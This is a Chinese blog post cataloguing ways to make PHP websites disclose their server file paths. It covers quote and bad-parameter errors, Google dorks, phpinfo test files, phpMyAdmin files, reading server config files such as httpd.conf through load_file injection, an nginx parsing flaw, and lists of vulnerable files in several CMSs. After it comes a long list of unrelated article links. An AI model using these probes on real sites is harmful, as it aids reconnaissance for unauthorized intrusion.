PHP爆破路徑方法總結

2020-03-13 22:50:14 眇玄

PHP爆破路徑方法總結

1、單引號爆路徑

說明：

直接在URL後面加單引號，要求單引號沒有被過濾(gpc=off)且服務器默認返回錯誤信息。

www.xxx.com/news.php?id=149′

2、錯誤參數值爆路徑

說明：

將要提交的參數值改成錯誤值，比如-1。-99999單引號被過濾時不妨試試。

www.xxx.com/researcharchive.php?id=-1

3、Google爆路徑

說明：

結合關鍵字和site語法搜索出錯頁面的網頁快照，常見關鍵字有warning和fatal error。注意，如果目標站點是二級域名，site接的是其對應的頂級域名，這樣得到的信息要多得多。

Site:xxx.edu.tw warning

Site:xxx.com.tw "fatal error"

4、測試文件爆路徑

說明：

很多網站的根目錄下都存在測試文件，腳本代碼通常都是phpinfo()。

www.xxx.com/test.php

www.xxx.com/ceshi.php

www.xxx.com/info.php

www.xxx.com/phpinfo.php

www.xxx.com/php_info.php

www.xxx.com/1.php

5、phpmyadmin爆路徑

說明：

一旦找到phpmyadmin的管理頁面，再訪問該目錄下的某些特定文件，就很有可能爆出物理路徑。至於phpmyadmin的地址可以用wwwscan這類的工具去掃，也可以選擇google。PS：有些BT網站會寫成phpMyAdmin。

1. /phpmyadmin/libraries/lect_lang.lib.php

2./phpMyAdmin/index.php?lang[]=1

3. /phpMyAdmin/phpinfo.php

4. load_file()

5./phpmyadmin/themes/darkblue_orange/layout.inc.php

6./phpmyadmin/libraries/select_lang.lib.php

7./phpmyadmin/libraries/lect_lang.lib.php

8./phpmyadmin/libraries/mcrypt.lib.php

6、配置文件找路徑

說明：

如果注入點有文件讀取權限，就可以手工load_file或工具讀取配置文件，再從中尋找路徑信息（一般在文件末尾）。各平臺下Web服務器和PHP的配置文件默認路徑可以上網查，這裡列舉常見的幾個。

Windows:

c:\\windows\\php.ini php配置文件

c:\\windows\\system32\\inetsrv\\MetaBase.xml IIS虛擬主機配置文件

Linux:

/etc/php.ini php配置文件

/etc/httpd/conf.d/php.conf

/etc/httpd/conf/httpd.conf Apache配置文件

/usr/local/apache/conf/httpd.conf

/usr/local/apache2/conf/httpd.conf

/usr/local/apache/conf/extra/httpd-vhosts.conf 虛擬目錄配置文件

7、nginx文件類型錯誤解析爆路徑

說明：

這是昨天無意中發現的方法，當然要求Web服務器是nginx，且存在文件類型解析漏洞。有時在圖片地址後加/x.php，該圖片不但會被當作php文件執行，還有可能爆出物理路徑。

www.xxx.com/top.jpg/x.php

8、其他

dedecms

/member/templets/menulit.php

plus/paycenter/alipay/return_url.php

plus/paycenter/cbpayment/autoreceive.php

paycenter/nps/config_pay_nps.php

plus/task/dede-maketimehtml.php

plus/task/dede-optimize-table.php

plus/task/dede-upcache.php

wp-admin/includes/file.php

wp-content/themes/baiaogu-seo/footer.php

ecshop商城系統暴路徑漏洞文件

/api/cron.php

/wap/goods.php

/temp/compiled/ur_here.lbi.php

/temp/compiled/pages.lbi.php

/temp/compiled/user_transaction.dwt.php

/temp/compiled/history.lbi.php

/temp/compiled/page_footer.lbi.php

/temp/compiled/goods.dwt.php

/temp/compiled/user_clips.dwt.php

/temp/compiled/goods_article.lbi.php

/temp/compiled/comments_list.lbi.php

/temp/compiled/recommend_promotion.lbi.php

/temp/compiled/search.dwt.php

/temp/compiled/category_tree.lbi.php

/temp/compiled/user_passport.dwt.php

/temp/compiled/promotion_info.lbi.php

/temp/compiled/user_menu.lbi.php

/temp/compiled/message.dwt.php

/temp/compiled/admin/pagefooter.htm.php

/temp/compiled/admin/page.htm.php

/temp/compiled/admin/start.htm.php

/temp/compiled/admin/goods_search.htm.php

/temp/compiled/admin/index.htm.php

/temp/compiled/admin/order_list.htm.php

/temp/compiled/admin/menu.htm.php

/temp/compiled/admin/login.htm.php

/temp/compiled/admin/message.htm.php

/temp/compiled/admin/goods_list.htm.php

/temp/compiled/admin/pageheader.htm.php

/temp/compiled/admin/top.htm.php

/temp/compiled/top10.lbi.php

/temp/compiled/member_info.lbi.php

/temp/compiled/bought_goods.lbi.php

/temp/compiled/goods_related.lbi.php

/temp/compiled/page_header.lbi.php

/temp/compiled/goods_script.html.php

/temp/compiled/index.dwt.php

/temp/compiled/goods_fittings.lbi.php

/temp/compiled/myship.dwt.php

/temp/compiled/brands.lbi.php

/temp/compiled/help.lbi.php

/temp/compiled/goods_gallery.lbi.php

/temp/compiled/comments.lbi.php

/temp/compiled/myship.lbi.php

/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php

/includes/modules/cron/auto_manage.php

/includes/modules/cron/ipdel.php

ucenter爆路徑

ucenter\\control\\admin\\db.php

DZbbs

manyou/admincp.php?my_suffix=%0A%0DTOBY57

z-blog

admin/FCKeditor/editor/dialog/fck%5Fspellerpages/spellerpages/server%2Dscripts/spellchecker.php

php168爆路徑

admin/inc/hack/count.php?job=list

admin/inc/hack/search.php?job=getcode

admin/inc/ajax/bencandy.php?job=do

cache/MysqlTime.txt

PHPcms2008-sp4

註冊用戶登陸後訪問

phpcms/corpandresize/process.php?pic=../images/logo.gif

bo-blog

PoC:

/go.php/

CMSeasy爆網站路徑漏洞

漏洞出現在menu_top.php這個文件中

lib/mods/celive/menu_top.php

/lib/default/ballot_act.php

lib/default/special_act.php

分享到:

閱讀更多眇玄的文章

關鍵字: Nginx phpMyAdmin

PHP 實現簡單計算器

PHP curl模擬登錄帶驗證碼的網站

PHP 跳出循環的方法; continue、break、exit之間的區別

PHP 7.4.4 發佈

php socket函數原理以及使用

PHP Curl的簡單使用

菜鳥日誌——php.ini中的短標籤

PHP Snoopy網頁抓取工具（淺談）

PHP header函數的使用

PHP 基礎知識（二）

PHP 基礎知識（一）

十大排序算法-快速排序 PHP 實現

02.09 php cli控制檯腳本錯誤輸出到php

「PHP」git項目利用webhook實現自動部署

PHP Webshell下繞過disable

php 中四捨五入的方法

php 判斷字符串中是否含有大寫字母的方法

PHP-Session利用總結

php 輸出404狀態碼

PHP 獲取本月第一天、最後一天，本週第一天、最後一天時間戳

PHP 沒有真正的數組

linux查看nginx、apache、php、php-fpm、mysql及配置項所在目錄

PHP 數組函數整理

PHP 資料庫SQL優化

PHP 小冷門知識

「php」php中常用的加密解密算法的講解（代碼）

09.19 php+redis實現消息隊列

「PHP」先從一個簡單的socket伺服器開始

PHP 代碼審計之添加管理員

PHP 代碼審計之文件刪除

「php」php中圖片處理和文件操作的方法小結（附代碼）

「php」php正則表達常用函數的總結（代碼示例）

「php」php如何快速導出資料庫到csv（代碼實現）

「php」php中流程控制語句簡單介紹（附示例）

「php」教你一步一步來創建一個php擴展（基本步驟）

PHP 運行模式總結

「php」如何使用php中ftp的上傳和下載功能的實現代碼

08.07 PHP 7.3 比 PHP 7.0 快 22%，即將進入特性凍結階段

PHP 進階（一）

php firebase/php-jwt token驗證（還在用session嗎？）

php curl詳細解析和常見大坑

07.04 php 超級實用的SQLite3類

PHP 常用框架

「php」從業者不同階段必須掌握的職業技能

「php」分享PHP外包公司常見的幾道面試題

PHP快速寫一個安裝程序install.php

「php」PHP 預定義類 Mysqli 常用代碼集合

「php」關於string函數介紹與使用方法詳解

02.12 PHP 的"魔術常量"，你知道多少？

PHP 實現人民幣數字轉漢字大寫

第二章 IoC容器和Bean配置

bean是一個對象，它是由Spring

運算裡不得不說的python模塊—math

Help

Devops度量--DevOps 現狀快速檢查表

今天主要分享一個DevOps

SOP是什麼（解讀）

SOP不是單個的，是一個體系，雖然我們可以單獨地定義每一個SOP，但真正從企業管理來看，SOP不可能只是單個的，必然是一個整體和體系，也是企業不可或缺的。

還不知道交換機上如何配置DHCP，趕緊過來圍觀吧，一分鐘包你學會

隨著終端設備的越來越多，人工干預配置IP地址，不僅工作效率低，而且，還很容易導致IP衝突，影響正常的網絡訪問。到此已經完成了，DHCP服務的配置了，我們可以在終端驗證。

還在手動配置IP地址嗎？太Low了，一分鐘教會您如何配置DHCP

Python爬蟲自學筆記：分析頭條文章網頁源文件

這兩天分析了一下頭條文章網頁的源文件，現在將分析的結果分享給大家。首先以一篇文章為例，其網址如下：https://www.toutiao.com/i6822245428176617998/如上圖網頁所示，文章中包含文字和圖片。

DNS偵查工具

我們只需要打開瀏覽器輸入例如:www.baidu.com就可以解析到該網站.為了便於記住不需要輸入長長的IP地址去訪問這就是DNS域名解析.關於域名域名的層次劃分用點來分割這時DNS把相對應的域名解析成IP地址高的在右邊.例如:www. NS簡介訪問某網站的時候最低在左邊

國人開源的異步 Python ORM：GINO

程序測評：Create React App 3.3中有哪些酷炫新功能？

Create

“明學”的魅力？我只要我覺得：駕馭終端，提高生產力

最後一個要介紹的命令是

（必收藏系列）Linux面試題——命令集

關注，後臺私信【Linux】分享Linux入門到進階電子書、Linux入門到精通視頻教程（免費）。文件管理命令cat

五分鐘學會如何在 IPFS 上部署網站

原文標題:五分鐘學會如何在

「正點原子NANO STM32F103開發板資料連載」第29章內存管理實驗

1）實驗平臺：【正點原子】

小白怎麼學Web前端開發如何成為技術達人

Web前端開發工程師已經成為了很多年輕人心中的理想工作，不僅入行門檻低、而且薪資待遇和發展前景都不錯，自然吸引了大批人加入行業。

如何開發一個web靜態服務器

我們都知道如今的web服務器有很多，比如著名的有apache，有nginx，有tomcat，有resin服務器，有sphere，有iis服務器等等，這些服務器都能提供web服務，並且幾乎都能和多種語言進行搭配使用，那麼一個web服務器都需要那些功能，開發一個web服務器都需要那些

學Java編程還有前景嗎如何才能拿到高薪

需求大、薪資高似乎是Java開發人員的標籤，不過學Java編程還有前景嗎？它架構在操作系統之上，屏蔽了底層的差異，真正實現了“Writeonce run

Python網絡爬蟲之配置篇（一）

pip

SpringBoot 整合SpringSecurity示例實現前後分離權限註解+JWT登錄認證

serverTimezone=UTC&useUnicode=true&characterEncoding=utf-8&zeroDateTimeBehavior=convertTo&useSSL=falseusername:rootpassword:

Python的運行效率太低？幾行代碼快速提升！

return的就是是你所需要的結果2.3、運行這一步就是最後一步了，只要像下面一樣輸入上述函數名，賦予參數值，點擊運行Run，就能得到你想要的結果arg1=5

python的優點是什麼？最新Python400集視頻（附教程）

2020，最新Python零基礎到精通資料教材，乾貨分享，新基礎Python教材，穩穩找到過萬工作，看這裡，這裡有你想要的所有資源哦，最強筆記，教你怎麼入門提升！獲取方式：私信小編“

MySQL中OOM故障應如何下手-愛可生

作者：孫祚龍愛可生南區分公司交付服務部成員，實習工程師。負責公司產品問題排查及日常運維工作。本文來源：原創投稿*愛可生開源社區出品，原創內容未經授權不得隨意使用，轉載請聯繫小編並註明來源。

像專家一樣使用 panic

|go

30種不同的編程語言怎麼寫“Hello, World”

printfn

percona QAN 介紹

一、背景QAN慢查詢日誌分析工具是PMM

面試官：你可以用純CSS判斷鼠標進入的方向嗎？

雖然沒什麼軟用，但是對付面試官應該是夠用了。感謝面試官提出的問題，讓我實現了這個功能，對CSS

網絡工程師職業生涯中，哪兩點是最重要的？

網絡工程師最重要的技能是紮實的基礎和非常開放的思維，微觀知識紮實、宏觀能力突出。項目經驗也會讓網絡工程師基礎更牢靠，網絡工程師是要實戰的，要避免紙上談兵，我認為對基礎理論的理解，比你清楚配置更重要。

交換機中相關術語代表什麼意思，有必要弄清楚

由淺入深瞭解以太坊 2.0：最常見問題和最全學習清單

有關以太坊2.0

【Linux簡單實用小命令001】CentOS 7、8的防火牆端口開放

yuminstall

吃透這些IPFS硬核知識點，日後搶頭礦隨時“彎道超車”

今天的你捉住IPFS機遇了嗎？我們都知道在Filecoin網絡中作為一名存儲礦工，信譽對於我們是非常重要的——信譽越高，爆塊幾率越大。那麼信譽系統現在怎麼樣了呢？

Hive分桶表

fieldsterminated

Spring中資源的加載原來是這麼一回事啊！

自己動手搭建郵件系統：怎樣讓Exchange Server 發出第一封郵件？

編輯Exchange

$【MySQL】RDS物理備份文件(.idb\.frm)恢復到MySQL自建數據庫$

【MySQL】RDS物理備份文件(.idb\.frm)恢復到MySQL自建數據庫

在阿里雲控制檯，我們能下載的文件是一個壓縮包，解壓之後，是.idb和.frm文件，你可能要問了，我可以直接把解壓好的問題件覆蓋到MySQL的data目錄下嗎？

NLP算法入門系列：隱含馬爾可夫鏈(HMM)模型的簡單介紹

即，最大化

第一章 Spring Framework概述

您可以在任何web

opencv人工智能深度學習這樣實現人臉的年齡檢測

前期的文章我們分享了人臉的識別以及如何進行人臉數據的訓練，本期文章我們結合人臉識別的模型進行人臉年齡的檢測人臉年齡的檢測步驟1、首先需要進行人臉的檢測2、把檢測到的人臉數據給年齡檢測模型去檢測3、把檢測結果呈現到圖片上人臉年齡檢測import

嵌入式linux網絡編程之——5年程序員給你深度講解socket套接字

圖8-1

深入瞭解ProcessFunction的狀態操作(Flink-1.10)

先反思為何會有上述疑惑上述疑惑產生的原因，應該是受到平時使用HashMap的影響，HashMap獲取值就是在調用get方法時指定key，設置值也是在put時指定key，所以看到state.value，看懂了這些，其實也是在瞭解DataStream/DataSetAPI的設計思路：

Redis內存分析工具--rdr安裝與使用

分析Redis

資深架構師教你源碼講解zookeeper實現分佈式鎖以及集群搭建步驟

//getData發現前一個子節點被刪除，拋出異常

一行代碼提升遷移性能

論文原址：https://arxiv.org/pdf/2003.12237.pdf開源地址：https://github.com/cuishuhao/BNM在發表在CVPR2020

利用相似幾何信息，做可泛化3D形狀分割模型

更具體的有以下三種典型的分割方案：FullyConvolutional-Like

這麼好用的開源計算器SpeedCrunch，沒有不嘗試一下的道理

介紹SpeedCrunch是一款高精度科學計算器，具有快速，鍵盤驅動的用戶界面。獲取方式在GitHub上搜索SpeedCrunch，就可以去到

分佈式緩存，真香

他是前易寶支付架構師、阿里雲MVP、騰訊雲

特徵工程的力量

在本文中，我希望教給您一些有關特徵工程的知識，以及如何使用它來對非線性決策邊界進行建模。為了說明這一點，假設恢復時間與身高和體重具有以下關係：Y=β₀+β₁+β2+β₃+noise從第三項來看，我們可以看到Y與身高和體重沒有線性關係。

java架構：天天寫面向接口編程，你考慮過性能嗎？大神都是這麼寫

public

SpringBoot如何優雅的使用RocketMQ

源碼編譯需要Maven3.2x，JDK8在根目錄進行打包:Copymvn-Prelease-all

css代碼規範工具stylelint

"mixin"

PHP爆破路徑方法總結

PHP爆破路徑方法總結

相關文章:

PHP 實現簡單計算器

PHP curl模擬登錄帶驗證碼的網站

PHP 跳出循環的方法; continue、break、exit之間的區別

PHP 7.4.4 發佈

php socket函數原理以及使用

PHP Curl的簡單使用

菜鳥日誌——php.ini中的短標籤

PHP Snoopy網頁抓取工具（淺談）

PHP header函數的使用

PHP 基礎知識（二）

PHP 基礎知識（一）

十大排序算法-快速排序 PHP 實現

02.09 php cli控制檯腳本錯誤輸出到php

「PHP」git項目利用webhook實現自動部署

PHP Webshell下繞過disable

php 中四捨五入的方法

php 判斷字符串中是否含有大寫字母的方法

PHP-Session利用總結

php 輸出404狀態碼

PHP 獲取本月第一天、最後一天，本週第一天、最後一天時間戳

PHP 沒有真正的數組

linux查看nginx、apache、php、php-fpm、mysql及配置項所在目錄

PHP 數組函數整理

PHP 資料庫SQL優化

PHP 小冷門知識

「php」php中常用的加密解密算法的講解（代碼）

09.19 php+redis實現消息隊列

「PHP」先從一個簡單的socket伺服器開始

PHP 代碼審計之添加管理員

PHP 代碼審計之文件刪除

「php」php中圖片處理和文件操作的方法小結（附代碼）

「php」php正則表達常用函數的總結（代碼示例）

「php」php如何快速導出資料庫到csv（代碼實現）

「php」php中流程控制語句簡單介紹（附示例）

「php」教你一步一步來創建一個php擴展（基本步驟）

PHP 運行模式總結

「php」如何使用php中ftp的上傳和下載功能的實現代碼

08.07 PHP 7.3 比 PHP 7.0 快 22%，即將進入特性凍結階段

PHP 進階（一）

php firebase/php-jwt token驗證（還在用session嗎？）

php curl詳細解析和常見大坑

07.04 php 超級實用的SQLite3類

PHP 常用框架

「php」從業者不同階段必須掌握的職業技能

「php」分享PHP外包公司常見的幾道面試題

PHP快速寫一個安裝程序install.php

「php」PHP 預定義類 Mysqli 常用代碼集合

「php」關於string函數介紹與使用方法詳解

02.12 PHP 的"魔術常量"，你知道多少？

PHP 實現人民幣數字轉漢字大寫

第二章 IoC容器和Bean配置

運算裡不得不說的python模塊—math

Devops度量--DevOps 現狀快速檢查表

SOP是什麼（解讀）

還不知道交換機上如何配置DHCP，趕緊過來圍觀吧，一分鐘包你學會

還在手動配置IP地址嗎？太Low了，一分鐘教會您如何配置DHCP

Python爬蟲自學筆記：分析頭條文章網頁源文件

DNS偵查工具

國人開源的異步 Python ORM：GINO

程序測評：Create React App 3.3中有哪些酷炫新功能？

“明學”的魅力？我只要我覺得：駕馭終端，提高生產力

（必收藏系列）Linux面試題——命令集

五分鐘學會如何在 IPFS 上部署網站

「正點原子NANO STM32F103開發板資料連載」第29章 內存管理實驗

小白怎麼學Web前端開發 如何成為技術達人

如何開發一個web靜態服務器

學Java編程還有前景嗎 如何才能拿到高薪

Python網絡爬蟲之配置篇（一）

SpringBoot 整合SpringSecurity示例實現前後分離權限註解+JWT登錄認證

Python的運行效率太低？幾行代碼快速提升！

python的優點是什麼？最新Python400集視頻（附教程）

MySQL中OOM故障應如何下手-愛可生

像專家一樣使用 panic

30種不同的編程語言怎麼寫“Hello, World”

percona QAN 介紹

面試官：你可以用純CSS判斷鼠標進入的方向嗎？

網絡工程師職業生涯中，哪兩點是最重要的？

「正點原子NANO STM32F103開發板資料連載」第29章內存管理實驗

小白怎麼學Web前端開發如何成為技術達人

學Java編程還有前景嗎如何才能拿到高薪